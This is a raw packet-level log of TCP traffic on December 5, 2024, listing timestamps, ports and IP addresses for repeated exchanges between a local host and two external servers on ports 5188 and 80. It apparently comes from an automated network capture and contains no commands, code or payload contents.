                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:16.360165119 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:16.360203028 CET497925188192.168.2.1192.255.85.66
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:16.361094952 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:16.361162901 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:16.361176968 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:16.361217976 CET497925188192.168.2.1192.255.85.66
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:16.362101078 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:16.362112999 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:16.362127066 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:16.362164021 CET497925188192.168.2.1192.255.85.66
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:16.362185955 CET497925188192.168.2.1192.255.85.66
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:16.363045931 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:16.363096952 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:16.363109112 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:16.363145113 CET497925188192.168.2.1192.255.85.66
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:16.363954067 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:16.363992929 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:16.364007950 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:16.364042044 CET497925188192.168.2.1192.255.85.66
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:16.364895105 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:16.364926100 CET497925188192.168.2.1192.255.85.66
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:16.364962101 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:16.364974976 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:16.365010023 CET497925188192.168.2.1192.255.85.66
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:16.365835905 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:16.365931988 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:16.365943909 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:16.365981102 CET497925188192.168.2.1192.255.85.66
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:16.365982056 CET497925188192.168.2.1192.255.85.66
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:16.366832018 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:16.366851091 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:16.366864920 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:16.366889000 CET497925188192.168.2.1192.255.85.66
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:16.367851019 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:16.367897034 CET497925188192.168.2.1192.255.85.66
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:16.367904902 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:16.367918968 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:16.367949963 CET497925188192.168.2.1192.255.85.66
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:16.368738890 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:16.368788958 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:16.368802071 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:16.368839025 CET497925188192.168.2.1192.255.85.66
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:16.369720936 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:16.369766951 CET497925188192.168.2.1192.255.85.66
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:16.369782925 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:16.369796038 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:16.369832039 CET497925188192.168.2.1192.255.85.66
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:16.370655060 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:16.370738029 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:16.370755911 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:16.370779991 CET497925188192.168.2.1192.255.85.66
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:16.371660948 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:16.371715069 CET497925188192.168.2.1192.255.85.66
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:16.371767998 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:16.371782064 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:16.371817112 CET497925188192.168.2.1192.255.85.66
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:16.372618914 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:16.372642994 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:16.372657061 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:16.372684956 CET497925188192.168.2.1192.255.85.66
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:16.373610973 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:16.373661041 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:16.373672962 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:16.373714924 CET497925188192.168.2.1192.255.85.66
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:16.374563932 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:16.374813080 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:16.374864101 CET497925188192.168.2.1192.255.85.66
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:16.374869108 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:16.374881983 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:16.374927044 CET497925188192.168.2.1192.255.85.66
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:16.375776052 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:16.375828981 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:16.375842094 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:16.375874043 CET497925188192.168.2.1192.255.85.66
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:16.376727104 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:16.376765013 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:16.376781940 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:16.376812935 CET497925188192.168.2.1192.255.85.66
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:16.376831055 CET497925188192.168.2.1192.255.85.66
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:16.377701998 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:16.377742052 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:16.377754927 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:16.377784014 CET497925188192.168.2.1192.255.85.66
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:16.378670931 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:16.378716946 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:16.378730059 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:16.378742933 CET497925188192.168.2.1192.255.85.66
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:16.378772020 CET497925188192.168.2.1192.255.85.66
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:16.379681110 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:16.379760981 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:16.379772902 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:16.379798889 CET497925188192.168.2.1192.255.85.66
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:16.380819082 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:16.380847931 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:16.380860090 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:16.380908012 CET497925188192.168.2.1192.255.85.66
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:16.380939960 CET497925188192.168.2.1192.255.85.66
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:16.381742954 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:16.381768942 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:16.381782055 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:16.381817102 CET497925188192.168.2.1192.255.85.66
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:16.382586956 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:16.382643938 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:16.382661104 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:16.382688046 CET497925188192.168.2.1192.255.85.66
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:16.382708073 CET497925188192.168.2.1192.255.85.66
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:16.383444071 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:16.383524895 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:16.383538008 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:16.383577108 CET497925188192.168.2.1192.255.85.66
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:16.384392977 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:16.384447098 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:16.384458065 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:16.384496927 CET497925188192.168.2.1192.255.85.66
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:16.385390043 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:16.385445118 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:16.385457039 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:16.385488987 CET497925188192.168.2.1192.255.85.66
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:16.386365891 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:16.386435986 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:16.386447906 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:16.386482000 CET497925188192.168.2.1192.255.85.66
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:16.386502981 CET497925188192.168.2.1192.255.85.66
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:16.387917042 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:16.439874887 CET497925188192.168.2.1192.255.85.66
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:16.459209919 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:16.459297895 CET4979380192.168.2.11185.215.113.84
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:16.459373951 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:16.459413052 CET4979380192.168.2.11185.215.113.84
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:16.459548950 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:16.459628105 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:16.459666967 CET4979380192.168.2.11185.215.113.84
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:16.460567951 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:16.460637093 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:16.460643053 CET4979380192.168.2.11185.215.113.84
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:16.460669994 CET4979380192.168.2.11185.215.113.84
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:16.461359978 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:16.461400032 CET4979380192.168.2.11185.215.113.84
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:16.461615086 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:16.461680889 CET4979380192.168.2.11185.215.113.84
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:16.462296963 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:16.462349892 CET4979380192.168.2.11185.215.113.84
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:16.463104963 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:16.463232994 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:16.463290930 CET4979380192.168.2.11185.215.113.84
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:16.463489056 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:16.463529110 CET4979380192.168.2.11185.215.113.84
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:16.464189053 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:16.464235067 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:16.464243889 CET4979380192.168.2.11185.215.113.84
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:16.464266062 CET4979380192.168.2.11185.215.113.84
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:16.465112925 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:16.465157032 CET4979380192.168.2.11185.215.113.84
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:16.465395927 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:16.465434074 CET4979380192.168.2.11185.215.113.84
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:16.466029882 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:16.466108084 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:16.466147900 CET4979380192.168.2.11185.215.113.84
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:16.467092037 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:16.467153072 CET4979380192.168.2.11185.215.113.84
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:16.467550039 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:16.467601061 CET4979380192.168.2.11185.215.113.84
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:16.467886925 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:16.467936039 CET4979380192.168.2.11185.215.113.84
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:16.468178988 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:16.468262911 CET4979380192.168.2.11185.215.113.84
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:16.468805075 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:16.469023943 CET4979380192.168.2.11185.215.113.84
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:16.469037056 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:16.469073057 CET4979380192.168.2.11185.215.113.84
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:16.469789028 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:16.469836950 CET4979380192.168.2.11185.215.113.84
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:16.470319986 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:16.470357895 CET4979380192.168.2.11185.215.113.84
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:16.470696926 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:16.470746994 CET4979380192.168.2.11185.215.113.84
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:16.470904112 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:16.470967054 CET4979380192.168.2.11185.215.113.84
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:16.471640110 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:16.471688986 CET4979380192.168.2.11185.215.113.84
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:16.471771002 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:16.472532034 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:16.472587109 CET4979380192.168.2.11185.215.113.84
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:16.473109007 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:16.473159075 CET4979380192.168.2.11185.215.113.84
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:16.473531008 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:16.473573923 CET4979380192.168.2.11185.215.113.84
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:16.473772049 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:16.473814011 CET4979380192.168.2.11185.215.113.84
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:16.474463940 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:16.474505901 CET4979380192.168.2.11185.215.113.84
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:16.474572897 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:16.474611044 CET4979380192.168.2.11185.215.113.84
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:16.475337982 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:16.475388050 CET4979380192.168.2.11185.215.113.84
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:16.475457907 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:16.475493908 CET4979380192.168.2.11185.215.113.84
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:16.476317883 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:16.476375103 CET4979380192.168.2.11185.215.113.84
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:16.476447105 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:16.476490021 CET4979380192.168.2.11185.215.113.84
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:16.477247953 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:16.477281094 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:16.477310896 CET4979380192.168.2.11185.215.113.84
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:16.477332115 CET4979380192.168.2.11185.215.113.84
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:16.478252888 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:16.478303909 CET4979380192.168.2.11185.215.113.84
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:16.478354931 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:16.478389978 CET4979380192.168.2.11185.215.113.84
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:16.479026079 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:16.479079008 CET4979380192.168.2.11185.215.113.84
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:16.479624033 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:16.479677916 CET4979380192.168.2.11185.215.113.84
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:16.480017900 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:16.480066061 CET4979380192.168.2.11185.215.113.84
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:16.480895996 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:16.480941057 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:16.480954885 CET4979380192.168.2.11185.215.113.84
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:16.480957031 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:16.480977058 CET4979380192.168.2.11185.215.113.84
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:16.480998039 CET4979380192.168.2.11185.215.113.84
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:16.481879950 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:16.482080936 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:16.482134104 CET4979380192.168.2.11185.215.113.84
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:16.482780933 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:16.482829094 CET4979380192.168.2.11185.215.113.84
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:16.482902050 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:16.482944965 CET4979380192.168.2.11185.215.113.84
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:16.483783960 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:16.483859062 CET4979380192.168.2.11185.215.113.84
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:16.485011101 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:16.485095978 CET4979380192.168.2.11185.215.113.84
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:16.485148907 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:16.485191107 CET4979380192.168.2.11185.215.113.84
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:16.485215902 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:16.485250950 CET4979380192.168.2.11185.215.113.84
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:16.485913992 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:16.486043930 CET4979380192.168.2.11185.215.113.84
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:16.486162901 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:16.486268997 CET4979380192.168.2.11185.215.113.84
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:16.486541033 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:16.486591101 CET4979380192.168.2.11185.215.113.84
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:16.486654043 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:16.487129927 CET4979380192.168.2.11185.215.113.84
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:16.487437963 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:16.487493038 CET4979380192.168.2.11185.215.113.84
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:16.487838030 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:16.487888098 CET4979380192.168.2.11185.215.113.84
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:16.488390923 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:16.488478899 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:16.488517046 CET4979380192.168.2.11185.215.113.84
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:16.488543987 CET4979380192.168.2.11185.215.113.84
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:16.489324093 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:16.489366055 CET4979380192.168.2.11185.215.113.84
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:16.489459991 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:16.489562035 CET4979380192.168.2.11185.215.113.84
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:16.490194082 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:16.490252018 CET4979380192.168.2.11185.215.113.84
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:16.490313053 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:16.490348101 CET4979380192.168.2.11185.215.113.84
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:16.491158962 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:16.491369009 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:16.491437912 CET4979380192.168.2.11185.215.113.84
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:16.492202997 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:16.492269039 CET4979380192.168.2.11185.215.113.84
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:16.492295027 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:16.492332935 CET4979380192.168.2.11185.215.113.84
